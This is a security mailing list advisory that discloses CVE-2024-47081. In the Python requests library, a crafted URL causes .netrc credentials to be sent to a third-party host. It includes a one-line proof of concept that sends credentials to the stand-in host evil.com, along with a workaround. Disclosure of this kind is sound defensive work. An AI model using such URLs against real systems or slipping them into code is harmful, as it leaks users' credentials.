[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CVE-2024-47081: Netrc credential leak in PSF requests library

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library
From: Juho Forsén via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Sat, 31 May 2025 06:30:50 +0000

The PSF requests library (https://github.com/psf/requests & 
https://pypi.org/project/requests/) leaks .netrc credentials to third parties 
due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

  requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to 
evil.com by the call.

The root cause is 
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on 
September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved 
by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every 
API call to disable .netrc access.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Prev by Date: [FD] Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Next by Date: [FD] Multiple Vulnerabilities in SAP GuiXT Scripting
Previous by thread: [FD] Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Next by thread: [FD] Multiple Vulnerabilities in SAP GuiXT Scripting
Index(es):
- Date
- Thread